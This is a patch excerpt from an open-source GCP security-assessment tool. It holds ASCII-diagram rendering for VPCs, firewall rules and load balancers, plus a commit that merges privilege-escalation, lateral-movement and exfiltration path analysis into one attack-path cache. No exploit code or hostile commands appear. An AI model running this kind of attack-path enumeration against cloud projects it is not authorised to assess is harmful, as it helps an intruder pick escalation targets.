sb.WriteString("┬") + } + sb.WriteString("────────────") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString("┬────────────") + } + sb.WriteString(strings.Repeat(" ", max(0, width-6-(numProjects*13)-14))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("▼ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-6-(numProjects*13)-14))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + sb.WriteString("┌──────────┐ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ... ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." + } + sb.WriteString(fmt.Sprintf("│%-10s│ ", proj)) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(fmt.Sprintf("(+%d more) ", len(config.ServiceProjects)-6)) + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("└──────────┘ ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12+12))) + sb.WriteString("│\n") + } + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func collectAllPeerings(peeringMap map[string][]VPCPeeringInfo) []VPCPeeringInfo { + var all []VPCPeeringInfo + for _, peerings := range peeringMap { + all = append(all, peerings...) + } + return all +} + +func drawPeeringSummary(peerings []VPCPeeringInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERING CONNECTIONS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, peering := range peerings { + // Draw peering connection + networkName := extractNetworkNameFromURL(peering.Network) + peerNetworkName := extractNetworkNameFromURL(peering.PeerNetwork) + + state := peering.State + if state == "" { + state = "ACTIVE" + } + + routeInfo := "" + if peering.ExportRoutes && peering.ImportRoutes { + routeInfo = "[export+import routes]" + } else if peering.ExportRoutes { + routeInfo = "[export routes]" + } else if peering.ImportRoutes { + routeInfo = "[import routes]" + } + + line := fmt.Sprintf(" %s <──────> %s (%s) %s", networkName, peerNetworkName, state, routeInfo) + if len(line) > width-4 { + line = line[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawNetworkLegend draws a legend for network topology diagrams +func DrawNetworkLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "PGA:Y/N = Private Google Access enabled/disabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Logs:Y/N = VPC Flow Logs enabled/disabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[SHARED VPC HOST] = Project hosts shared VPC networks")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[SHARED VPC SERVICE] = Project uses shared VPC networks")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[n PEERING(s)] = Number of VPC peering connections")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "<──────> = VPC peering connection")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// Firewall Diagram Functions +// ======================================== + +// DrawFirewallDiagram generates an ASCII diagram showing firewall rules +func DrawFirewallDiagram( + rules []FirewallRuleInfo, + networkName string, + projectID string, + width int, +) string { + var sb strings.Builder + + title := fmt.Sprintf("FIREWALL RULES: %s", networkName) + if projectID != "" { + title = fmt.Sprintf("FIREWALL RULES: %s (Project: %s)", networkName, projectID) + } + + sb.WriteString(DrawBox(title, width)) + sb.WriteString("\n") + + // Separate ingress and egress + var ingressRules, egressRules []FirewallRuleInfo + for _, rule := range rules { + if strings.ToUpper(rule.Direction) == "INGRESS" { + ingressRules = append(ingressRules, rule) + } else { + egressRules = append(egressRules, rule) + } + } + + // Draw ingress section + if len(ingressRules) > 0 { + sb.WriteString(drawFirewallSection("INGRESS (Inbound Traffic)", ingressRules, width)) + sb.WriteString("\n") + } + + // Draw egress section + if len(egressRules) > 0 { + sb.WriteString(drawFirewallSection("EGRESS (Outbound Traffic)", egressRules, width)) + sb.WriteString("\n") + } + + // Draw traffic flow visualization + sb.WriteString(drawTrafficFlowDiagram(ingressRules, egressRules, width)) + + // Legend + sb.WriteString(DrawFirewallLegend(width)) + + return sb.String() +} + +func drawFirewallSection(title string, rules []FirewallRuleInfo, width int) string { + var sb strings.Builder + + // Sort by priority + sort.Slice(rules, func(i, j int) bool { + return rules[i].Priority < rules[j].Priority + }) + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, rule := range rules { + // Risk indicator + riskIndicator := " " + if rule.IsPublicIngress { + riskIndicator = "⚠ " + } + + // Disabled indicator + disabledLabel := "" + if rule.Disabled { + disabledLabel = " [DISABLED]" + } + + // Format source ranges + sources := strings.Join(rule.SourceRanges, ", ") + if len(sources) > 30 { + sources = sources[:27] + "..." + } + if sources == "" { + sources = "*" + } + + // Format targets + targets := rule.TargetTags + if targets == "" { + targets = "ALL" + } + + // Rule name line + nameLine := fmt.Sprintf("%s%s (Priority: %d)%s", riskIndicator, rule.Name, rule.Priority, disabledLabel) + if len(nameLine) > width-4 { + nameLine = nameLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, nameLine)) + + // Details line + detailLine := fmt.Sprintf(" Sources: %s → Ports: %s → Targets: %s", sources, rule.AllowedPorts, targets) + if len(detailLine) > width-4 { + detailLine = detailLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, detailLine)) + sb.WriteString(DrawEmptyLine(width)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawTrafficFlowDiagram(ingressRules, egressRules []FirewallRuleInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "TRAFFIC FLOW VISUALIZATION")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Count public ingress + publicIngress := 0 + for _, r := range ingressRules { + if r.IsPublicIngress { + publicIngress++ + } + } + + // Draw simplified flow + sb.WriteString("│ │\n") + sb.WriteString("│ ┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐ │\n") + sb.WriteString("│ │ INTERNET │ ─────> │ FIREWALL RULES │ ─────> │ VPC/VMs │ │\n") + sb.WriteString("│ │ (External) │ │ │ │ (Internal) │ │\n") + sb.WriteString("│ └─────────────┘ └─────────────────────┘ └─────────────┘ │\n") + sb.WriteString("│ │\n") + + // Summary stats + statsLine := fmt.Sprintf(" Ingress Rules: %d (Public: %d) Egress Rules: %d", len(ingressRules), publicIngress, len(egressRules)) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, statsLine)) + + if publicIngress > 0 { + warningLine := " ⚠ WARNING: Public ingress rules allow traffic from 0.0.0.0/0" + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine)) + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawFirewallLegend draws the firewall diagram legend +func DrawFirewallLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "⚠ = Public ingress rule (0.0.0.0/0 source)")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Priority = Lower number = higher priority (evaluated first)")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[DISABLED] = Rule is not active")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Targets: ALL = Rule applies to all instances in network")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// Load Balancer Diagram Functions +// ======================================== + +// DrawLoadBalancerDiagram generates an ASCII diagram showing load balancer architecture +func DrawLoadBalancerDiagram( + loadBalancers []LoadBalancerInfo, + projectID string, + width int, +) string { + var sb strings.Builder + + title := "LOAD BALANCER ARCHITECTURE" + if projectID != "" { + title = fmt.Sprintf("LOAD BALANCER ARCHITECTURE (Project: %s)", projectID) + } + + sb.WriteString(DrawBox(title, width)) + sb.WriteString("\n") + + // Separate external and internal + var externalLBs, internalLBs []LoadBalancerInfo + for _, lb := range loadBalancers { + if strings.ToUpper(lb.Scheme) == "EXTERNAL" { + externalLBs = append(externalLBs, lb) + } else { + internalLBs = append(internalLBs, lb) + } + } + + // Draw external load balancers + if len(externalLBs) > 0 { + sb.WriteString(drawLoadBalancerSection("EXTERNAL LOAD BALANCERS (Internet-facing)", externalLBs, width)) + sb.WriteString("\n") + } + + // Draw internal load balancers + if len(internalLBs) > 0 { + sb.WriteString(drawLoadBalancerSection("INTERNAL LOAD BALANCERS (Private)", internalLBs, width)) + sb.WriteString("\n") + } + + // Draw architecture overview + sb.WriteString(drawLBArchitectureOverview(externalLBs, internalLBs, width)) + + // Legend + sb.WriteString(DrawLoadBalancerLegend(width)) + + return sb.String() +} + +func drawLoadBalancerSection(title string, lbs []LoadBalancerInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, lb := range lbs { + // Security indicator + securityLabel := "" + if lb.SecurityPolicy != "" { + securityLabel = " [Cloud Armor]" + } + + // Type and name + typeLine := fmt.Sprintf(" %s: %s (%s)%s", lb.Type, lb.Name, lb.Region, securityLabel) + if len(typeLine) > width-4 { + typeLine = typeLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, typeLine)) + + // IP and Port + ipLine := fmt.Sprintf(" IP: %s:%s", lb.IPAddress, lb.Port) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, ipLine)) + + // Backend services + if len(lb.BackendServices) > 0 { + backends := strings.Join(lb.BackendServices, ", ") + if len(backends) > width-20 { + backends = backends[:width-23] + "..." + } + backendLine := fmt.Sprintf(" Backends: %s", backends) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, backendLine)) + } + + sb.WriteString(DrawEmptyLine(width)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawLBArchitectureOverview(externalLBs, internalLBs []LoadBalancerInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "ARCHITECTURE OVERVIEW")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + sb.WriteString("│ │\n") + + if len(externalLBs) > 0 { + sb.WriteString("│ ┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐ │\n") + sb.WriteString("│ │ INTERNET │ ─────> │ External LB │ ─────> │ Backends │ │\n") + sb.WriteString("│ │ │ │ (Cloud Armor) │ │ (GCE/GKE) │ │\n") + sb.WriteString("│ └─────────────┘ └─────────────────────┘ └─────────────┘ │\n") + sb.WriteString("│ │\n") + } + + if len(internalLBs) > 0 { + sb.WriteString("│ ┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐ │\n") + sb.WriteString("│ │ VPC │ ─────> │ Internal LB │ ─────> │ Backends │ │\n") + sb.WriteString("│ │ (Private) │ │ (Regional) │ │ (Private) │ │\n") + sb.WriteString("│ └─────────────┘ └─────────────────────┘ └─────────────┘ │\n") + sb.WriteString("│ │\n") + } + + // Count with Cloud Armor + armorCount := 0 + for _, lb := range externalLBs { + if lb.SecurityPolicy != "" { + armorCount++ + } + } + + statsLine := fmt.Sprintf(" External: %d Internal: %d With Cloud Armor: %d", len(externalLBs), len(internalLBs), armorCount) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, statsLine)) + + if len(externalLBs) > 0 && armorCount == 0 { + warningLine := " ⚠ No external load balancers have Cloud Armor protection" + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine)) + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawLoadBalancerLegend draws the load balancer diagram legend +func DrawLoadBalancerLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[Cloud Armor] = WAF/DDoS protection enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "EXTERNAL = Internet-facing load balancer")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "INTERNAL = Private/VPC-only load balancer")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "global = Global anycast load balancer")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "regional = Region-specific load balancer")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// VPC Networks Diagram Functions +// ======================================== + +// DrawVPCNetworksDiagram generates a compact VPC networks overview diagram +func DrawVPCNetworksDiagram( + networks []NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, + peerings []VPCPeeringInfo, + projectID string, + width int, +) string { + var sb strings.Builder + + title := "VPC NETWORKS OVERVIEW" + if projectID != "" { + title = fmt.Sprintf("VPC NETWORKS OVERVIEW (Project: %s)", projectID) + } + + sb.WriteString(DrawBox(title, width)) + sb.WriteString("\n") + + // Draw each network + for _, network := range networks { + sb.WriteString(drawVPCNetworkCompact(network, subnetsByNetwork, width)) + sb.WriteString("\n") + } + + // Peering summary + if len(peerings) > 0 { + sb.WriteString(drawVPCPeeringsCompact(peerings, width)) + sb.WriteString("\n") + } + + // Legend + sb.WriteString(DrawVPCNetworkLegend(width)) + + return sb.String() +} + +func drawVPCNetworkCompact(network NetworkInfo, subnetsByNetwork map[string][]SubnetInfo, width int) string { + var sb strings.Builder + + // Network header + sharedLabel := "" + if network.IsSharedVPC { + sharedLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole)) + } + peeringLabel := "" + if network.PeeringCount > 0 { + peeringLabel = fmt.Sprintf(" [%d peerings]", network.PeeringCount) + } + + title := fmt.Sprintf("VPC: %s (%s routing)%s%s", network.Name, network.RoutingMode, sharedLabel, peeringLabel) + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + if len(title) > width-4 { + title = title[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Get subnets + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, " (No subnets)")) + } else { + // Group by region + byRegion := make(map[string][]SubnetInfo) + for _, s := range subnets { + byRegion[s.Region] = append(byRegion[s.Region], s) + } + + var regions []string + for r := range byRegion { + regions = append(regions, r) + } + sort.Strings(regions) + + for _, region := range regions { + regionSubnets := byRegion[region] + regionLine := fmt.Sprintf(" 📍 %s:", region) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, regionLine)) + + for _, s := range regionSubnets { + pga := "-" + if s.PrivateIPGoogleAccess { + pga = "PGA" + } + logs := "-" + if s.FlowLogsEnabled { + logs = "Logs" + } + subnetLine := fmt.Sprintf(" %s (%s) [%s][%s]", s.Name, s.IPCIDRRange, pga, logs) + if len(subnetLine) > width-4 { + subnetLine = subnetLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, subnetLine)) + } + } + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawVPCPeeringsCompact(peerings []VPCPeeringInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERINGS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, p := range peerings { + networkName := extractNetworkNameFromURL(p.Network) + peerNetworkName := extractNetworkNameFromURL(p.PeerNetwork) + routes := "" + if p.ExportRoutes && p.ImportRoutes { + routes = " [↔ routes]" + } else if p.ExportRoutes { + routes = " [→ export]" + } else if p.ImportRoutes { + routes = " [← import]" + } + line := fmt.Sprintf(" %s ←→ %s (%s)%s", networkName, peerNetworkName, p.State, routes) + if len(line) > width-4 { + line = line[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawVPCNetworkLegend draws the VPC network diagram legend +func DrawVPCNetworkLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "PGA = Private Google Access enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Logs = VPC Flow Logs enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "←→ = VPC Peering connection")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "📍 = Region location")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// Helper Functions +// ======================================== + +// extractNetworkNameFromURL extracts network name from full URL +func extractNetworkNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// max returns the maximum of two integers +func max(a, b int) int { + if a > b { + return a + } + return b +} From 2b272a1335734fd01a06e87e05731daa648f6869 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 16 Jan 2026 00:21:08 -0500 Subject: [PATCH 22/48] merged privesc, lat movemet, and data exfil into attack paths --- cli/gcp.go | 49 +- gcp/commands/appengine.go | 20 +- gcp/commands/cloudbuild.go | 20 +- gcp/commands/cloudrun.go | 34 +- gcp/commands/composer.go | 20 +- gcp/commands/dataexfiltration.go | 236 +++- gcp/commands/dataflow.go | 20 +- gcp/commands/dataproc.go | 22 +- gcp/commands/functions.go | 22 +- gcp/commands/gke.go | 20 +- gcp/commands/instances.go | 20 +- gcp/commands/lateralmovement.go | 252 +++- gcp/commands/notebooks.go | 34 +- gcp/commands/privesc.go | 84 +- gcp/commands/scheduler.go | 20 +- gcp/commands/serviceaccounts.go | 30 +- gcp/commands/whoami.go | 441 ++++++- .../attackpathService/attackpathService.go | 1063 ++++++++++++++++ gcp/services/privescService/privescService.go | 1087 ----------------- internal/gcp/attackpath_cache.go | 418 +++++++ internal/gcp/privesc_cache.go | 247 +--- 21 files changed, 2607 insertions(+), 1552 deletions(-) create mode 100644 gcp/services/attackpathService/attackpathService.go delete mode 100644 gcp/services/privescService/privescService.go create mode 100644 internal/gcp/attackpath_cache.go diff --git a/cli/gcp.go b/cli/gcp.go index 29124282..4d0655d6 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -7,9 +7,9 @@ import ( "time" "github.com/BishopFox/cloudfox/gcp/commands" + attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" - privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" @@ -263,9 +263,9 @@ var GCPAllChecksCommand = &cobra.Command{ }, } -// runPrivescAndPopulateCache runs the privesc analysis and returns a populated cache -func runPrivescAndPopulateCache(ctx context.Context) *gcpinternal.PrivescCache { - cache := gcpinternal.NewPrivescCache() +// runAttackPathAnalysisAndPopulateCache runs attack path analysis for all types and returns a populated cache +func runAttackPathAnalysisAndPopulateCache(ctx context.Context) *gcpinternal.AttackPathCache { + cache := gcpinternal.NewAttackPathCache() // Get project IDs from context projectIDs, ok := ctx.Value("projectIDs").([]string) @@ -279,35 +279,60 @@ func runPrivescAndPopulateCache(ctx context.Context) *gcpinternal.PrivescCache { projectNames = make(map[string]string) } - // Run privesc analysis - svc := privescservice.New() - result, err := svc.CombinedPrivescAnalysis(ctx, projectIDs, projectNames) + // Use unified attackpathService for all 3 types + svc := attackpathservice.New() + + // Run analysis for all attack path types + result, err := svc.CombinedAttackPathAnalysis(ctx, projectIDs, projectNames, "all") if err != nil { - GCPLogger.ErrorM(fmt.Sprintf("Failed to run privesc analysis: %v", err), "all-checks") + GCPLogger.ErrorM(fmt.Sprintf("Failed to run attack path analysis: %v", err), "all-checks") return cache } - // Convert privesc paths to cache format - var pathInfos []gcpinternal.PrivescPathInfo + // Convert paths to cache format + var pathInfos []gcpinternal.AttackPathInfo for _, path := range result.AllPaths { - pathInfos = append(pathInfos, gcpinternal.PrivescPathInfo{ + var pathType gcpinternal.AttackPathType + switch path.PathType { + case "privesc": + pathType = gcpinternal.AttackPathPrivesc + case "exfil": + pathType = gcpinternal.AttackPathExfil + case "lateral": + pathType = gcpinternal.AttackPathLateral + default: + continue + } + + pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ Principal: path.Principal, PrincipalType: path.PrincipalType, Method: path.Method, + PathType: pathType, + Category: path.Category, RiskLevel: path.RiskLevel, Target: path.TargetResource, Permissions: path.Permissions, + ScopeType: path.ScopeType, + ScopeID: path.ScopeID, }) } // Populate cache cache.PopulateFromPaths(pathInfos) - GCPLogger.InfoM(fmt.Sprintf("Found %d privilege escalation path(s)", len(result.AllPaths)), "all-checks") + privesc, exfil, lateral := cache.GetStats() + GCPLogger.InfoM(fmt.Sprintf("Attack path analysis: %d privesc, %d exfil, %d lateral", privesc, exfil, lateral), "all-checks") return cache } +// runPrivescAndPopulateCache is kept for backward compatibility +// DEPRECATED: Use runAttackPathAnalysisAndPopulateCache instead +func runPrivescAndPopulateCache(ctx context.Context) *gcpinternal.PrivescCache { + return runAttackPathAnalysisAndPopulateCache(ctx) +} + // printExecutionSummary prints a summary of all executed modules func printExecutionSummary(modules []string, duration time.Duration) { GCPLogger.InfoM("", "all-checks") // blank line diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index 320e168e..22100a7a 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -104,7 +104,7 @@ type AppEngineModule struct { ProjectVersions map[string][]AppEngineVersion ProjectFirewallRules map[string][]AppEngineFirewallRule LootMap map[string]map[string]*internal.LootFile - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex totalApps int @@ -149,8 +149,8 @@ func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) @@ -492,7 +492,7 @@ func (m *AppEngineModule) getTableHeader() []string { "Ingress", "Public", "Service Account", - "Priv Esc", + "Attack Paths", "Default SA", "Deprecated", "Env Vars", @@ -533,13 +533,13 @@ func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngi deprecatedStr = "Yes" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if ver.ServiceAccount != "" { - privEsc = m.PrivescCache.GetPrivescSummary(ver.ServiceAccount) + attackPaths = m.AttackPathCache.GetAttackSummary(ver.ServiceAccount) } else { - privEsc = "No" + attackPaths = "No" } } @@ -557,7 +557,7 @@ func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngi ver.IngressSettings, publicStr, ver.ServiceAccount, - privEsc, + attackPaths, defaultSAStr, deprecatedStr, fmt.Sprintf("%d", ver.EnvVarCount), diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index 46e6fe1c..a8e038a7 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -39,7 +39,7 @@ type CloudBuildModule struct { ProjectBuilds map[string][]cloudbuildservice.BuildInfo // projectID -> builds ProjectSecurityAnalysis map[string][]cloudbuildservice.TriggerSecurityAnalysis // projectID -> analysis LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -78,8 +78,8 @@ func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject) @@ -305,7 +305,7 @@ func (m *CloudBuildModule) getTriggersHeader() []string { "Branch/Tag", "Config File", "Service Account", - "Priv Esc", + "Attack Paths", "Disabled", "Privesc Potential", } @@ -346,13 +346,13 @@ func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.Trig sa = "(default)" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { - privEsc = m.PrivescCache.GetPrivescSummary(sa) + attackPaths = m.AttackPathCache.GetAttackSummary(sa) } else { - privEsc = "No" + attackPaths = "No" } } @@ -365,7 +365,7 @@ func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.Trig branchTag, trigger.Filename, sa, - privEsc, + attackPaths, disabled, privescPotential, }) diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 1f0cb7e1..97910879 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -52,7 +52,7 @@ type CloudRunModule struct { ProjectServices map[string][]CloudRunService.ServiceInfo // projectID -> services ProjectJobs map[string][]CloudRunService.JobInfo // projectID -> jobs LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -90,8 +90,8 @@ func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or 